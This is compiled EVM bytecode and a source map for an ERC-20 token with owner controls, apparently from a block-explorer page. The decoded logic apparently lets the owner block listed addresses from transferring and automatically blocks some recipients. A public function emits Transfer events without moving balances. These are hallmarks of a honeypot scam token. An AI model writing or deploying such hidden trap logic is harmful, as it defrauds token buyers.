ffffffffffffffffffffffffffffffffffff161415610d4f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4690611b75565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e2d9190611647565b60405180910390a3505050565b6000610e468484610ade565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ec05781811015610eb2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea990611be1565b60405180910390fd5b610ebf8484848403610c6f565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d90611c73565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fa6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9d90611d05565b60405180910390fd5b610fb18383836113ad565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611038576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102f90611d97565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061116c5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156111c85760011515600660009054906101000a900460ff161515146111c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111be90611ddd565b60405180910390fd5b5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611273576001600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516112d09190611647565b60405180910390a36112e38484846113b2565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600080fd5b600080fd5b600080fd5b600080fd5b600080fd5b60008083601f8401126113e6576113e56113c1565b5b8235905067ffffffffffffffff811115611403576114026113c6565b5b60208301915083602082028301111561141f5761141e6113cb565b5b9250929050565b6000806020838503121561143d5761143c6113b7565b5b600083013567ffffffffffffffff81111561145b5761145a6113bc565b5b611467858286016113d0565b92509250509250929050565b600081519050919050565b600082825260208201905092915050565b60005b838110156114ad578082015181840152602081019050611492565b838111156114bc576000848401525b50505050565b6000601f19601f8301169050919050565b60006114de82611473565b6114e8818561147e565b93506114f881856020860161148f565b611501816114c2565b840191505092915050565b6000602082019050818103600083015261152681846114d3565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006115598261152e565b9050919050565b6115698161154e565b811461157457600080fd5b50565b60008135905061158681611560565b92915050565b6000819050919050565b61159f8161158c565b81146115aa57600080fd5b50565b6000813590506115bc81611596565b92915050565b600080604083850312156115d9576115d86113b7565b5b60006115e785828601611577565b92505060206115f8858286016115ad565b9150509250929050565b60008115159050919050565b61161781611602565b82525050565b6000602082019050611632600083018461160e565b92915050565b6116418161158c565b82525050565b600060208201905061165c6000830184611638565b92915050565b60008060006060848603121561167b5761167a6113b7565b5b600061168986828701611577565b935050602061169a86828701611577565b92505060406116ab868287016115ad565b9150509250925092565b600060ff82169050919050565b6116cb816116b5565b82525050565b60006020820190506116e660008301846116c2565b92915050565b600060208284031215611702576117016113b7565b5b600061171084828501611577565b91505092915050565b6117228161154e565b82525050565b600060208201905061173d6000830184611719565b92915050565b6000806040838503121561175a576117596113b7565b5b600061176885828601611577565b925050602061177985828601611577565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117ec8261158c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561181f5761181e6117b2565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061187157607f821691505b602082108114156118855761188461182a565b5b50919050565b60006118968261158c565b91506118a18361158c565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156118d6576118d56117b2565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061193d60258361147e565b9150611948826118e1565b604082019050919050565b6000602082019050818103600083015261196c81611930565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119cf60268361147e565b91506119da82611973565b604082019050919050565b600060208201905081810360008301526119fe816119c2565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a3b60208361147e565b9150611a4682611a05565b602082019050919050565b60006020820190508181036000830152611a6a81611a2e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611acd60248361147e565b9150611ad882611a71565b604082019050919050565b60006020820190508181036000830152611afc81611ac0565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b5f60228361147e565b9150611b6a82611b03565b604082019050919050565b60006020820190508181036000830152611b8e81611b52565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611bcb601d8361147e565b9150611bd682611b95565b602082019050919050565b60006020820190508181036000830152611bfa81611bbe565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611c5d60258361147e565b9150611c6882611c01565b604082019050919050565b60006020820190508181036000830152611c8c81611c50565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611cef60238361147e565b9150611cfa82611c93565b604082019050919050565b60006020820190508181036000830152611d1e81611ce2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611d8160268361147e565b9150611d8c82611d25565b604082019050919050565b60006020820190508181036000830152611db081611d74565b9050919050565b50565b6000611dc760008361147e565b9150611dd282611db7565b600082019050919050565b60006020820190508181036000830152611df681611dba565b905091905056fea264697066735822122079454fd7ed13711ecdbaeee9ba9e851fffe69739b665c9a43c23f4e6dc03ccc264736f6c63430008090033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101375760003560e01c806370a08231116100b8578063a457c2d71161007c578063a457c2d714610350578063a9059cbb14610380578063beabacc8146103b0578063d150475d146103cc578063dd62ed3e146103e8578063f2fde38b1461041857610137565b806370a08231146102aa578063715018a6146102da5780638658e787146102e45780638da5cb5b1461031457806395d89b411461033257610137565b806323b872dd116100ff57806323b872dd146101e0578063313ce56714610210578063395093511461022e5780634682ac8c1461025e57806367dfe4271461027a57610137565b806301c9bf5a1461013c57806306fdde0314610158578063095ea7b31461017657806318160ddd146101a65780631afdfa9b146101c4575b600080fd5b61015660048036038101906101519190611426565b610434565b005b6101606104e1565b60405161016d919061150c565b60405180910390f35b610190600480360381019061018b91906115c2565b610573565b60405161019d919061161d565b60405180910390f35b6101ae610596565b6040516101bb9190611647565b60405180910390f35b6101de60048036038101906101d99190611426565b6105a0565b005b6101fa60048036038101906101f59190611662565b61064d565b604051610207919061161d565b60405180910390f35b61021861067c565b60405161022591906116d1565b60405180910390f35b610248600480360381019061024391906115c2565b610685565b604051610255919061161d565b60405180910390f35b61027860048036038101906102739190611426565b6106bc565b005b610294600480360381019061028f91906116ec565b610769565b6040516102a1919061161d565b60405180910390f35b6102c460048036038101906102bf91906116ec565b6107bf565b6040516102d19190611647565b60405180910390f35b6102e2610808565b005b6102fe60048036038101906102f991906116ec565b61081c565b60405161030b919061161d565b60405180910390f35b61031c610872565b6040516103299190611728565b60405180910390f35b61033a61089b565b604051610347919061150c565b60405180910390f35b61036a600480360381019061036591906115c2565b61092d565b604051610377919061161d565b60405180910390f35b61039a600480360381019061039591906115c2565b6109a4565b6040516103a7919061161d565b60405180910390f35b6103ca60048036038101906103c59190611662565b6109c7565b005b6103e660048036038101906103e19190611426565b610a31565b005b61040260048036038101906103fd9190611743565b610ade565b60405161040f9190611647565b60405180910390f35b610432600480360381019061042d91906116ec565b610b65565b005b61043c610be9565b60005b828290508110156104dc5760006002600085858581811061046357610462611783565b5b905060200201602081019061047891906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104d4906117e1565b91505061043f565b505050565b6060600780546104f090611859565b80601f016020809104026020016040519081016040528092919081815260200182805461051c90611859565b80156105695780601f1061053e57610100808354040283529160200191610569565b820191906000526020600020905b81548152906001019060200180831161054c57829003601f168201915b5050505050905090565b60008061057e610c67565b905061058b818585610c6f565b600191505092915050565b6000600554905090565b6105a8610be9565b60005b82829050811015610648576001600360008585858181106105cf576105ce611783565b5b90506020020160208101906105e491906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610640906117e1565b9150506105ab565b505050565b600080610658610c67565b9050610665858285610e3a565b610670858585610ec6565b60019150509392505050565b60006012905090565b600080610690610c67565b90506106b18185856106a28589610ade565b6106ac919061188b565b610c6f565b600191505092915050565b6106c4610be9565b60005b82829050811015610764576001600260008585858181106106eb576106ea611783565b5b905060200201602081019061070091906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061075c906117e1565b9150506106c7565b505050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610810610be9565b61081a60006112e9565b565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600880546108aa90611859565b80601f01602080910402602001604051908101604052809291908181526020018280546108d690611859565b80156109235780601f106108f857610100808354040283529160200191610923565b820191906000526020600020905b81548152906001019060200180831161090657829003601f168201915b5050505050905090565b600080610938610c67565b905060006109468286610ade565b90508381101561098b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098290611953565b60405180910390fd5b6109988286868403610c6f565b60019250505092915050565b6000806109af610c67565b90506109bc818585610ec6565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610a249190611647565b60405180910390a3505050565b610a39610be9565b60005b82829050811015610ad957600060036000858585818110610a6057610a5f611783565b5b9050602002016020810190610a7591906116ec565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610ad1906117e1565b915050610a3c565b505050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610b6d610be9565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610bdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd4906119e5565b60405180910390fd5b610be6816112e9565b50565b610bf1610c67565b73ffffffffffffffffffffffffffffffffffffffff16610c0f610872565b73ffffffffffffffffffffffffffffffffffffffff1614610c65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5c90611a51565b60405180910390fd5b565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610cdf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cd690611ae3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610d4f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4690611b75565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e2d9190611647565b60405180910390a3505050565b6000610e468484610ade565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ec05781811015610eb2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ea990611be1565b60405180910390fd5b610ebf8484848403610c6f565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610f36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2d90611c73565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610fa6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9d90611d05565b60405180910390fd5b610fb18383836113ad565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015611038576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161102f90611d97565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061116c5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156111c85760011515600660009054906101000a900460ff161515146111c7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111be90611ddd565b60405180910390fd5b5b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615611273576001600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516112d09190611647565b60405180910390a36112e38484846113b2565b50505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600080fd5b600080fd5b600080fd5b600080fd5b600080fd5b60008083601f8401126113e6576113e56113c1565b5b8235905067ffffffffffffffff811115611403576114026113c6565b5b60208301915083602082028301111561141f5761141e6113cb565b5b9250929050565b6000806020838503121561143d5761143c6113b7565b5b600083013567ffffffffffffffff81111561145b5761145a6113bc565b5b611467858286016113d0565b92509250509250929050565b600081519050919050565b600082825260208201905092915050565b60005b838110156114ad578082015181840152602081019050611492565b838111156114bc576000848401525b50505050565b6000601f19601f8301169050919050565b60006114de82611473565b6114e8818561147e565b93506114f881856020860161148f565b611501816114c2565b840191505092915050565b6000602082019050818103600083015261152681846114d3565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006115598261152e565b9050919050565b6115698161154e565b811461157457600080fd5b50565b60008135905061158681611560565b92915050565b6000819050919050565b61159f8161158c565b81146115aa57600080fd5b50565b6000813590506115bc81611596565b92915050565b600080604083850312156115d9576115d86113b7565b5b60006115e785828601611577565b92505060206115f8858286016115ad565b9150509250929050565b60008115159050919050565b61161781611602565b82525050565b6000602082019050611632600083018461160e565b92915050565b6116418161158c565b82525050565b600060208201905061165c6000830184611638565b92915050565b60008060006060848603121561167b5761167a6113b7565b5b600061168986828701611577565b935050602061169a86828701611577565b92505060406116ab868287016115ad565b9150509250925092565b600060ff82169050919050565b6116cb816116b5565b82525050565b60006020820190506116e660008301846116c2565b92915050565b600060208284031215611702576117016113b7565b5b600061171084828501611577565b91505092915050565b6117228161154e565b82525050565b600060208201905061173d6000830184611719565b92915050565b6000806040838503121561175a576117596113b7565b5b600061176885828601611577565b925050602061177985828601611577565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006117ec8261158c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82141561181f5761181e6117b2565b5b600182019050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061187157607f821691505b602082108114156118855761188461182a565b5b50919050565b60006118968261158c565b91506118a18361158c565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156118d6576118d56117b2565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061193d60258361147e565b9150611948826118e1565b604082019050919050565b6000602082019050818103600083015261196c81611930565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006119cf60268361147e565b91506119da82611973565b604082019050919050565b600060208201905081810360008301526119fe816119c2565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611a3b60208361147e565b9150611a4682611a05565b602082019050919050565b60006020820190508181036000830152611a6a81611a2e565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611acd60248361147e565b9150611ad882611a71565b604082019050919050565b60006020820190508181036000830152611afc81611ac0565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b5f60228361147e565b9150611b6a82611b03565b604082019050919050565b60006020820190508181036000830152611b8e81611b52565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611bcb601d8361147e565b9150611bd682611b95565b602082019050919050565b60006020820190508181036000830152611bfa81611bbe565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611c5d60258361147e565b9150611c6882611c01565b604082019050919050565b60006020820190508181036000830152611c8c81611c50565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611cef60238361147e565b9150611cfa82611c93565b604082019050919050565b60006020820190508181036000830152611d1e81611ce2565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611d8160268361147e565b9150611d8c82611d25565b604082019050919050565b60006020820190508181036000830152611db081611d74565b9050919050565b50565b6000611dc760008361147e565b9150611dd282611db7565b600082019050919050565b60006020820190508181036000830152611df681611dba565b905091905056fea264697066735822122079454fd7ed13711ecdbaeee9ba9e851fffe69739b665c9a43c23f4e6dc03ccc264736f6c63430008090033

Deployed Bytecode Sourcemap

81:132:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3868:179:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2167:98;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5520:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4331:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3201:173;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6279:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3104:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6960:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3563:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4053:106;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4495:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;4165:106:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1834:85:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2378:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7681:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4816:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3745:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3380:177;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5063:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3868:179:1;1727:13:0;:11;:13::i;:::-;3951:9:1::1;3946:95;3970:6;;:13;;3966:1;:17;3946:95;;;4025:5;4004:7;:18;4012:6;;4019:1;4012:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;4004:18;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;3985:3;;;;;:::i;:::-;;;;3946:95;;;;3868:179:::0;;:::o;2167:98::-;2221:13;2253:5;2246:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2167:98;:::o;5520:197::-;5603:4;5619:13;5635:12;:10;:12::i;:::-;5619:28;;5657:32;5666:5;5673:7;5682:6;5657:8;:32::i;:::-;5706:4;5699:11;;;5520:197;;;;:::o;4331:106::-;4392:7;4418:12;;4411:19;;4331:106;:::o;3201:173::-;1727:13:0;:11;:13::i;:::-;3279:9:1::1;3274:94;3298:6;;:13;;3294:1;:17;3274:94;;;3353:4;3332:7;:18;3340:6;;3347:1;3340:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3332:18;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;3313:3;;;;;:::i;:::-;;;;3274:94;;;;3201:173:::0;;:::o;6279:286::-;6406:4;6422:15;6440:12;:10;:12::i;:::-;6422:30;;6462:38;6478:4;6484:7;6493:6;6462:15;:38::i;:::-;6510:27;6520:4;6526:2;6530:6;6510:9;:27::i;:::-;6554:4;6547:11;;;6279:286;;;;;:::o;3104:91::-;3162:5;3186:2;3179:9;;3104:91;:::o;6960:234::-;7048:4;7064:13;7080:12;:10;:12::i;:::-;7064:28;;7102:64;7111:5;7118:7;7155:10;7127:25;7137:5;7144:7;7127:9;:25::i;:::-;:38;;;;:::i;:::-;7102:8;:64::i;:::-;7183:4;7176:11;;;6960:234;;;;:::o;3563:175::-;1727:13:0;:11;:13::i;:::-;3643:9:1::1;3638:94;3662:6;;:13;;3658:1;:17;3638:94;;;3717:4;3696:7;:18;3704:6;;3711:1;3704:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3696:18;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;3677:3;;;;;:::i;:::-;;;;3638:94;;;;3563:175:::0;;:::o;4053:106::-;4111:4;4134:7;:18;4142:9;4134:18;;;;;;;;;;;;;;;;;;;;;;;;;4127:25;;4053:106;;;:::o;4495:125::-;4569:7;4595:9;:18;4605:7;4595:18;;;;;;;;;;;;;;;;4588:25;;4495:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;4165:106:1:-;4223:4;4246:7;:18;4254:9;4246:18;;;;;;;;;;;;;;;;;;;;;;;;;4239:25;;4165:106;;;:::o;1834:85:0:-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;2378:102:1:-;2434:13;2466:7;2459:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2378:102;:::o;7681:427::-;7774:4;7790:13;7806:12;:10;:12::i;:::-;7790:28;;7828:24;7855:25;7865:5;7872:7;7855:9;:25::i;:::-;7828:52;;7918:15;7898:16;:35;;7890:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;8009:60;8018:5;8025:7;8053:15;8034:16;:34;8009:8;:60::i;:::-;8097:4;8090:11;;;;7681:427;;;;:::o;4816:189::-;4895:4;4911:13;4927:12;:10;:12::i;:::-;4911:28;;4949;4959:5;4966:2;4970:6;4949:9;:28::i;:::-;4994:4;4987:11;;;4816:189;;;;:::o;3745:117::-;3845:3;3829:26;;3838:5;3829:26;;;3850:4;3829:26;;;;;;:::i;:::-;;;;;;;;3745:117;;;:::o;3380:177::-;1727:13:0;:11;:13::i;:::-;3461:9:1::1;3456:95;3480:6;;:13;;3476:1;:17;3456:95;;;3535:5;3514:7;:18;3522:6;;3529:1;3522:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;3514:18;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;3495:3;;;;;:::i;:::-;;;;3456:95;;;;3380:177:::0;;:::o;5063:149::-;5152:7;5178:11;:18;5190:5;5178:18;;;;;;;;;;;;;;;:27;5197:7;5178:27;;;;;;;;;;;;;;;;5171:34;;5063:149;;;;:::o;2707:198:0:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;;;2787:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;1992:130::-;2066:12;:10;:12::i;:::-;2055:23;;:7;:5;:7::i;:::-;:23;;;2047:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1992:130::o;587:96::-;640:7;666:10;659:17;;587:96;:::o;12049:370:1:-;12197:1;12180:19;;:5;:19;;;;12172:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12277:1;12258:21;;:7;:21;;;;12250:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12359:6;12329:11;:18;12341:5;12329:18;;;;;;;;;;;;;;;:27;12348:7;12329:27;;;;;;;;;;;;;;;:36;;;;12396:7;12380:32;;12389:5;12380:32;;;12405:6;12380:32;;;;;;:::i;:::-;;;;;;;;12049:370;;;:::o;12700:441::-;12830:24;12857:25;12867:5;12874:7;12857:9;:25::i;:::-;12830:52;;12916:17;12896:16;:37;12892:243;;12977:6;12957:16;:26;;12949:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;13059:51;13068:5;13075:7;13103:6;13084:16;:25;13059:8;:51::i;:::-;12892:243;12820:321;12700:441;;;:::o;8562:943::-;8704:1;8688:18;;:4;:18;;;;8680:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;8780:1;8766:16;;:2;:16;;;;8758:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;8833:38;8854:4;8860:2;8864:6;8833:20;:38::i;:::-;8882:19;8904:9;:15;8914:4;8904:15;;;;